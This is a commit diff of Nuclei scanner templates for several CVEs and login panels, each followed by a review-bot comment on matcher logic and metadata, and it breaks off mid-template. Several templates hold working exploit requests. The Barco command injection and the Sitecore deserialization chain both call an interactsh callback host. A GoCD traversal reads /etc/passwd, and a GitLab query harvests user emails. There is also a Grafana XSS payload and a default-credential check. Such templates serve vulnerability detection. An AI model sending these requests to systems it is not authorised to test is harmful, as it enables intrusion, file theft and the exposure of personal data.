id: CVE-2019-3929
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)
|
||||||
|
author: _0xf4n9x_
|
||||||
|
severity: critical
|
||||||
|
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
|
||||||
|
reference:
|
||||||
|
- http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
|
||||||
|
- https://www.exploit-db.com/exploits/46786/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-3929
|
||||||
|
tags: rce,cve,cve2019,oast
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2019-3929
|
||||||
|
cwe-id: CWE-78
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi-bin/file_transfer.cgi"
|
||||||
|
|
||||||
|
body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
|
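Review bot: The only matcher accepts `interactsh_protocol` equal to `http`, so a device that runs the injected `curl` but cannot reach the collaborator over HTTP (egress filtered) is reported clean even though it resolved the name first; adding `- "dns"` under `words` (the word matcher's default condition is `or`) catches that resolution as well. Document the intent next to it with `# dns alone is enough: the lookup precedes curl's connect even when outbound HTTP is blocked`. The description says the command runs as root on the device, so keep the payload a pure callback as it is now rather than anything that changes state.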
@ -0,0 +1,50 @@
|
||||||
|
id: CVE-2020-26413
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gitlab User enumeration via Graphql API
|
||||||
|
author: _0xf4n9x_,pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.
|
||||||
|
reference:
|
||||||
|
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
|
||||||
|
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
|
||||||
|
tags: cve,cve2020,gitlab,exposure,enum
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.30
|
||||||
|
cve-id: CVE-2020-26413
|
||||||
|
cwe-id: CWE-200
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /api/graphql HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{
|
||||||
|
"query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }",
|
||||||
|
"variables": null,
|
||||||
|
"operationName": null
|
||||||
|
}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"username":'
|
||||||
|
- '"avatarUrl":'
|
||||||
|
- '"node":'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
part: body
|
||||||
|
json:
|
||||||
|
- '.data.users.edges[].node.email'
|
|
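Review bot: The `words` list (`"username":`, `"avatarUrl":`, `"node":` plus a 200) is satisfied by any GitLab that answers the unauthenticated `users` query, including fixed versions that presumably return `"email":null` for every node, so the template flags instances that are not affected; what distinguishes 13.4 to 13.6.1 is a populated email field. Adding `- '"email":"'` to the same `words` list (under the `and` condition already in place) requires at least one non-null address before the match fires. The `.data.users.edges[].node.email` extractor then writes real user addresses into the scan output; that is the evidence, but it is PII, so a comment such as `# extractor emits user e-mail addresses; treat output as sensitive` belongs next to it.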
@ -60,4 +60,4 @@ requests:
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com'
|
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
|
||||||
|
|
|
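Review bot: The replacement regex `([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)` is unanchored and no longer names the collaborator domain, so `group: 1` now captures the first label of whatever four-part dotted token appears first in `interactsh_request`, which for an HTTP interaction could be something other than the callback host (hedged; it depends on what the captured request contains). If the goal is support for self-hosted interactsh domains, anchoring on the `Host:` header, e.g. `'Host: ([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'`, keeps the capture tied to the callback URL, with the caveat that a DNS-only interaction has no Host line and would need its own pattern. The enclosing extractor begins before this hunk.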
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2021-31602
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pentaho <= 9.1 Authentication Bypass of Spring APIs
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
reference:
|
||||||
|
- https://seclists.org/fulldisclosure/2021/Nov/13
|
||||||
|
- https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software
|
||||||
|
- https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'Pentaho'
|
||||||
|
tags: cve,cve2021,pentaho,auth-bypass
|
||||||
|
|
||||||
|
description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n"
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js"
|
||||||
|
- "{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<roleList>'
|
||||||
|
- '<roles>Anonymous</roles>'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
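Review bot: `description` in this template is a double-quoted scalar ending in a literal `\n\n`, so the stored description carries two trailing newlines, and it sits after `tags` and a blank line rather than with the rest of `info`, unlike every other template in this commit. Move it up under `severity` and write it as a plain line ending in `...without possessing valid credentials.` with no escape sequences. `classification` (CVSS metrics, `cve-id`, `cwe-id`) is also absent although the other templates carry it; `cve-id: CVE-2021-31602` at least follows from the `id`.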
@ -25,8 +25,8 @@ requests:
|
||||||
Connection: close
|
Connection: close
|
||||||
X-Requested-With: XMLHttpRequest
|
X-Requested-With: XMLHttpRequest
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
Origin: http://{{Hostname}}/
|
Origin: {{BaseURL}}
|
||||||
Referer: http://{{Hostname}}/
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
||||||
|
|
||||||
|
@ -40,10 +40,10 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "\"result\":true"
|
- '"result":true'
|
||||||
- "id"
|
- 'id'
|
||||||
- "params"
|
- 'params'
|
||||||
- "session"
|
- 'session'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
|
|
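Review bot: `Origin: {{BaseURL}}` is only a well-formed Origin when the target is given without a path; `BaseURL` keeps any path supplied on the command line, and an Origin value with a path is not what browsers send, so a server that compares Origin strictly would reject the `global.login` call. If the nuclei version in use provides it, `{{RootURL}}` is the scheme-plus-host form meant for this header: `Origin: {{RootURL}}`, while `Referer` can keep `{{BaseURL}}` since a path is legitimate there. The previous `http://{{Hostname}}/` form was also wrong on HTTPS targets, so the change is in the right direction. The enclosing raw request starts before this hunk.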
@ -33,15 +33,12 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
req-condition: true
|
req-condition: true
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
|
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
|
||||||
|
- "status_code_1 == 500 && status_code_2 == 200"
|
||||||
- type: status
|
condition: and
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
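Review bot: Folding the status check into the DSL as `status_code_1 == 500 && status_code_2 == 200` under `condition: and` makes a positive depend on the first request erroring, while `contains(body_2,'uid=') && contains(body_2,'gid=')` on its own already shows the injected command ran; a host that executes the payload but answers the first request with another status is now missed. If the 500 is the known signature of the affected version, document it on that line, `# affected builds answer 500 to the trigger request; the uid/gid check is the actual proof`, otherwise reduce it to `status_code_2 == 200`. The `requests` entry this belongs to starts before the hunk.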
@ -0,0 +1,46 @@
|
||||||
|
id: CVE-2021-41174
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
|
||||||
|
author: pdteam
|
||||||
|
severity: medium
|
||||||
|
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
|
||||||
|
reference:
|
||||||
|
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
|
||||||
|
tags: cve,cve2021,grafana,xss
|
||||||
|
metadata:
|
||||||
|
shodan-query: title:"Grafana"
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-41174
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Grafana"
|
||||||
|
- "frontend_boot_js_done_time_seconds"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"subTitle":"Grafana ([a-z0-9.]+)'
|
|
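Review bot: Nothing in the matchers looks for the payload; the hit is decided by `Grafana`, `frontend_boot_js_done_time_seconds` and the `subTitle` version regex, i.e. this is a version fingerprint, presumably because the AngularJS expression in the snapshot path is evaluated in the browser and cannot be observed in the HTTP response. That is a defensible design, but the template should say so, e.g. above `matchers:` add `# version-based detection: the AngularJS sink runs client-side, so the payload cannot be confirmed from the response; verify in a browser`. `skip-variables-check: true` is there because `{{constructor.constructor(...)}}` looks like a nuclei variable, and a one-line comment to that effect prevents someone from removing it. The version regex `v8\.(?:(?:1|0)\.[0-9]|2\.[0-2])` only admits single-digit patch levels for 8.0/8.1 and is unanchored on the right, so confirm it against the full list of affected releases in the advisory.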
@ -0,0 +1,114 @@
|
||||||
|
id: CVE-2021-42237
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Sitecore Experience Platform Pre-Auth RCE
|
||||||
|
author: pdteam
|
||||||
|
severity: critical
|
||||||
|
description: Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://blog.assetnote.io/2021/11/02/sitecore-rce/
|
||||||
|
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-42237
|
||||||
|
remediation:
|
||||||
|
For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions-
|
||||||
|
- Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
|
||||||
|
- Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
||||||
|
- Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
|
||||||
|
- For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
||||||
|
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"SiteCore"
|
||||||
|
tags: rce,sitecore,deserialization,oast
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: text/xml
|
||||||
|
|
||||||
|
<?xml version="1.0" ?>
|
||||||
|
<a>
|
||||||
|
<query></query>
|
||||||
|
<source>foo</source>
|
||||||
|
<parameters>
|
||||||
|
<parameter name="">
|
||||||
|
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
|
||||||
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
|
||||||
|
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
|
||||||
|
xmlns:x="http://www.w3.org/2001/XMLSchema"
|
||||||
|
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
|
||||||
|
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
|
||||||
|
xmlns="">2</Count>
|
||||||
|
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
|
||||||
|
xmlns="">
|
||||||
|
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
|
||||||
|
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
|
||||||
|
xmlns:a="http://schemas.datacontract.org/2004/07/System">
|
||||||
|
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
|
||||||
|
xmlns="">
|
||||||
|
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
|
||||||
|
<a:delegateEntry z:Id="7">
|
||||||
|
<a:assembly z:Ref="6" i:nil="true"/>
|
||||||
|
<a:delegateEntry i:nil="true"/>
|
||||||
|
<a:methodName z:Id="8">Compare</a:methodName>
|
||||||
|
<a:target i:nil="true"/>
|
||||||
|
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
|
||||||
|
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
|
||||||
|
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
|
||||||
|
</a:delegateEntry>
|
||||||
|
<a:methodName z:Id="11">Start</a:methodName>
|
||||||
|
<a:target i:nil="true"/>
|
||||||
|
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
|
||||||
|
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
|
||||||
|
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
|
||||||
|
</Delegate>
|
||||||
|
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
|
||||||
|
xmlns=""
|
||||||
|
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
|
||||||
|
<Name z:Ref="11" i:nil="true"/>
|
||||||
|
<AssemblyName z:Ref="12" i:nil="true"/>
|
||||||
|
<ClassName z:Ref="13" i:nil="true"/>
|
||||||
|
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
|
||||||
|
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
|
||||||
|
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
|
||||||
|
<GenericArguments i:nil="true"/>
|
||||||
|
</method0>
|
||||||
|
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
|
||||||
|
xmlns=""
|
||||||
|
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
|
||||||
|
<Name z:Ref="8" i:nil="true"/>
|
||||||
|
<AssemblyName z:Ref="6" i:nil="true"/>
|
||||||
|
<ClassName z:Ref="9" i:nil="true"/>
|
||||||
|
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
|
||||||
|
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
|
||||||
|
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
|
||||||
|
<GenericArguments i:nil="true"/>
|
||||||
|
</method1>
|
||||||
|
</_comparison>
|
||||||
|
</Comparer>
|
||||||
|
<Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
|
||||||
|
xmlns="">2</Version>
|
||||||
|
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
|
||||||
|
xmlns="">
|
||||||
|
<string z:Id="25"
|
||||||
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {{interactsh-url}}</string>
|
||||||
|
<string z:Id="26"
|
||||||
|
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
|
||||||
|
</Items>
|
||||||
|
</ArrayOfstring>
|
||||||
|
</parameter>
|
||||||
|
</parameters>
|
||||||
|
</a>
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "System.ArgumentNullException"
|
|
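Review bot: `tags: rce,sitecore,deserialization,oast` omits the `cve,cve2021` tags and the `classification` block (`cve-id`, `cwe-id`, CVSS) that the CVE-2021-41174 and CVE-2021-43287 sections of this commit carry, so a tag-based run for `cve2021` will not select this template; suggest `tags: cve,cve2021,rce,sitecore,deserialization,oast` plus a `classification:` block with `cve-id: CVE-2021-42237` and `cwe-id: CWE-502`. The `remediation` text repeats the "For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file ..." sentence twice (fourth bullet and trailing paragraph), and as rendered here the value has no block-scalar indicator, so the bullet lines are presumably folded into one plain string — if a `|` was lost in rendering this is moot, otherwise `remediation: |` keeps the line structure.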
@ -0,0 +1,28 @@
|
||||||
|
id: CVE-2021-43287
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pre-Auth Takeover of Build Pipelines in GoCD
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: critical
|
||||||
|
reference:
|
||||||
|
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
|
||||||
|
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
|
||||||
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
||||||
|
tags: cve,cve2021,go,lfi,gocd
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
|
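Review bot: The template has no `description` and no `classification` block, while the CVE-2021-41174 section in the same commit has both; judging from the request, a one-liner such as `description: The unauthenticated /go/add-on/business-continuity/api/plugin endpoint returns the file named by pluginName, allowing arbitrary file read from the GoCD server.` (confirm against the references) would tell a reader what a match means. The reference list also lacks the NVD entry that the other CVE templates link, and `tags: cve,cve2021,go,lfi,gocd` uses the bare `go` tag, which reads as the language rather than the product — worth a check that it is the intended taxonomy.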
@ -0,0 +1,37 @@
|
||||||
|
id: pentaho-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pentaho Default Login
|
||||||
|
author: pussycat0x
|
||||||
|
severity: high
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'pentaho'
|
||||||
|
tags: pentaho,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /pentaho/j_spring_security_check HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
j_username={{user}}&j_password={{pass}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
user:
|
||||||
|
- admin
|
||||||
|
pass:
|
||||||
|
- password
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'pentaho/Home'
|
||||||
|
- 'JSESSIONID='
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
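Review bot: Of the two header words, `JSESSIONID=` is presumably issued on failed login attempts as well (servlet containers set the session cookie before the outcome is decided), so the discriminating signal is the `pentaho/Home` redirect target together with the 302; a comment above `words:` such as `# successful login redirects to pentaho/Home; JSESSIONID alone is not proof` would stop a future maintainer loosening the condition to `or`. The template also has no `description` or `reference`, unlike the CVE templates in this commit.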
@ -0,0 +1,32 @@
|
||||||
|
id: acemanager-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ACEmanager detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
fofa-dork: 'app="ACEmanager"'
|
||||||
|
tags: login,tech,acemanager
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<title>::: ACEmanager :::</title>'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'ALEOS Version ([0-9.]+) \| Copyright &co'
|
|
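Review bot: `tags: login,tech,acemanager` and `name: ACEmanager detect` disagree with the id `acemanager-login` and with the convention the other login-page templates in this commit follow (`panel,<product>`: `panel,kerio`, `panel,meshcentral`, `panel,sitecore`); suggest `tags: panel,acemanager` and `name: ACEmanager Login`. The same applies to the kenesto-login section (`tags: login,tech,kenesto`, `name: Kenesto Login Detect`). In both, `condition: and` under a single-entry `words` list is a no-op and can be dropped.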
@ -0,0 +1,26 @@
|
||||||
|
id: cisco-prime-infrastructure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco Prime Infrastructure
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"prime infrastructure"'
|
||||||
|
tags: panel,cisco
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webacs/pages/common/login.jsp"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'productName = "Prime Infrastructure"'
|
||||||
|
- "Cisco "
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
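Review bot: The word matcher lists `productName = "Prime Infrastructure"` and `"Cisco "` without a `condition`, and the default for `words` is `or`, so any 200 response on `/webacs/pages/common/login.jsp` containing the substring `Cisco ` satisfies it; add `condition: and` under `words:` so both strings are required. The first string is already a strong fingerprint on its own, so `"Cisco "` only earns its place as the second half of an `and`.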
@ -0,0 +1,24 @@
|
||||||
|
id: gocd-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GoCD Login
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
tags: go,panel,gocd
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'html:"GoCD Version"'
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/go/auth/login'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Login - Go</title>'
|
||||||
|
- 'gocd-params'
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
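Review bot: `words:` lists `<title>Login - Go</title>` and `gocd-params` with no `condition`, so the default `or` lets `gocd-params` alone satisfy the matcher; add `condition: and`. The matcher list also runs straight from `- 'gocd-params'` into `- type: status` without the blank line every other matcher list in this commit uses. `author: dhiyaneshDK` is spelled `dhiyaneshDk` in the CVE-2021-43287, kerio-connect-client and gocd-cruise-configuration sections and `DhiyaneshDK` in sitecore-default-page; one spelling keeps attribution and author counts consistent.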
@ -0,0 +1,25 @@
|
||||||
|
id: kenesto-login
|
||||||
|
info:
|
||||||
|
name: Kenesto Login Detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
fofa-dork: 'app="kenesto"'
|
||||||
|
tags: login,tech,kenesto
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
